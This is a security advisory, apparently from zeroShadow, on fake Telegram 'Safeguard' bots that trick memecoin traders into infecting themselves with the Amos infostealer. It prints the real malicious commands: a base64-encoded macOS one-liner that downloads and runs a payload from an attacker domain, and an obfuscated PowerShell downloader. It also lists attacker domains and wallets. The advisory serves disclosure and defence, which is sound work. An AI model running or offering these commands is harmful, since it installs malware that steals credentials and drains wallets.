zeroShadow is aware of a widespread and ongoing campaign that involves malicious Safeguard bots on Telegram in order to distribute malware and drain crypto wallets. If the bot is interacted with, it can result in the detonation of malware (an infostealer variant called Amos Stealer) and the draining of user crypto wallets.
Safeguard was originally created to verify a user account before they interact with a Telegram or Discord channel - to help admins manage their groups more efficiently and protect them from spammers, scammers, bot attacks, and unwanted behavior. This malicious version preys on people’s belief that they should complete the Safeguard “checks” to gain access to the Telegram channel.
The threat actor(s) behind this campaign are running a professional operation, albeit leveraging malware that operates under a malware-as-a-service (MaaS) model, notably Atomic macOS Stealer (Amos). From a single week of activity in January 2025, zeroShadow traced stolen funds exceeding $1.8M USD that can be attributed to this campaign. The total stolen across all Safeguard scam activity is much higher.
What have we seen?
Through our partners, we have investigated a number of cases involving this Safeguard campaign and can reveal how the exploit occurs.
The Telegram groups responsible for hosting the Safeguard bot are often advertised through social media and other Telegram groups associated with the trading of memecoins on the Solana network.
If a user attempts to join one of these malicious Telegram groups, they are presented with an imitation Safeguard bot and asked to interact with it. The malicious Safeguard bot simply impersonates the branding of the real bot and instructs the user to run a command on their device, which is dependent on their operating system (Windows or macOS).
The commands are obfuscated using base64, but our analysis of the decrypted version shows they:
Download a file to a temporary folder
Remove any quarantine flags to bypass security restrictions
Grant executable permissions to the downloaded file
Execute the malicious file, installing the malware
WARNING - THE FOLLOWING ARE MALICIOUS COMMANDS - DO NOT RUN
On macOS the command is as follows:
echo "Y3VybCAtbyAvdG1wL3VwZGF0ZSBodHRwczovL3JndWVhcHAuY29tL3Z2L3VwZGF0ZSAmJiB4YXR0ciAtYyAvdG1wL3VwZGF0ZSAmJiBjaG1vZCAreCAvdG1wL3VwZGF0ZSAmJiAvdG1wL3VwZGF0ZQ==" | base64 -d | bash &
On Windows the command is as follows:
powershell -w hidden -c $r='0hHduY3N1hTMsxWTvI3dQFzLt92YuIjc0hTNxE2axAnM58yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr')
The malware that is installed is an infostealer variant called Atomic macOS stealer (Amos stealer), which is capable of extracting the following:
System information
Keychain data
Saved passwords
Cookies
Autofill information including payment card data
Crypto wallet data that can be used to hijack and steal those wallets files
Application data (including for Telegram)
This ultimately allows the threat actor to compromise the users wallets, draining all the tokens. The threat actor could also leverage the other stolen data to further compromise the victim. But this has not been the case with the victims we are aware of.
Due to the techniques used, the user would be entirely unaware of the execution and detonation of these payloads, and they are designed to bypass Windows User Access Control (UAC), meaning the user would receive no warnings.
Analysis of the malware by zeroShadow is ongoing but we can confidently say any impacted user would be infected with some form of Remote Access Trojan (RAT) or infostealer, which would result in the loss of their credentials and compromise of their crypto wallets and subsequent loss of tokens.
Some of the malicious domains we have identified are:
hxxps://x[.]com/koIlwaii
t[.]me/kolwaiihq
hxxps://rgueapp[.]com
hxxps://92p1ka158tr2p[.]com
hxxps://clearguide[.]cyou
Tracing the funds
This threat actor is primarily targeting traders of memecoins on the Solana blockchain. Unfortunately, this community is most vulnerable to this type of exploitation due to the nature of memecoins and the way they are advertised across social media.
In the first week of tracing these funds in January 2025, the primary threat actor controlled wallets receiving stolen funds are as follows:
3ksZvaFjTVdZKz9VJRtq1CGwP7xidNPWKyt5JFg5V5Ec which has received 3,090 SOL
GYARMZefSErvLZfHUFjhd7goZq7YBYDWdZKV24xvTab4 which has received 1,822.89 SOL
C2DuY9SmkGcxVQNnUwPMAiNbe1fbA7roRJ24cPsKvbLp which has received 152.71 SOL
This SOL has an approximate value of $1.2M USD and these addresses have also received other tokens with values exceeding $600K USD
The threat actor has made use of the bridging service Wormhole to swap SOL for ETH on the Ethereum blockchain, and has made further swaps to Monero through eXch and other instant exchangers. They have also used the privacy protocol Railgun as a mixer.
What can you do?
There are many precautions you can take to prevent yourself from being a victim of this scam. These include:
Do not interact with unknown Telegram groups and bots.
Never launch commands without fully understanding their function, no matter how benign they seem.
Use a standalone password manager which features vault encryption.
Use a firewall that blocks new traffic by default to prevent malware command and control, such as LuLu.
Use crypto wallets that feature multisig transaction signing, or require a hardware device.
Store the bulk of your funds on a cold wallet, which is not associated with your main device.
Engage the services of a Web3 focused security company like zeroShadow.
Should you come across a Telegram group which demands interaction with a Safeguard style bot, act immediately to:
Exit the group without any interaction with the bot.
Do not run any commands.
Inform your security team.
Provide details to zeroShadow and SEAL 911 as soon as possible.
If you accidentally interact with the bot and detonate the malware:
Immediately isolate the device from the web.
Urgently secure your crypto tokens into a new safe wallet.
Change your passwords, enabling multi factor authentication whenever possible.
Work with your security team to resolve any infection. Get in touch with zeroShadow.
Original article by the zeroShadow team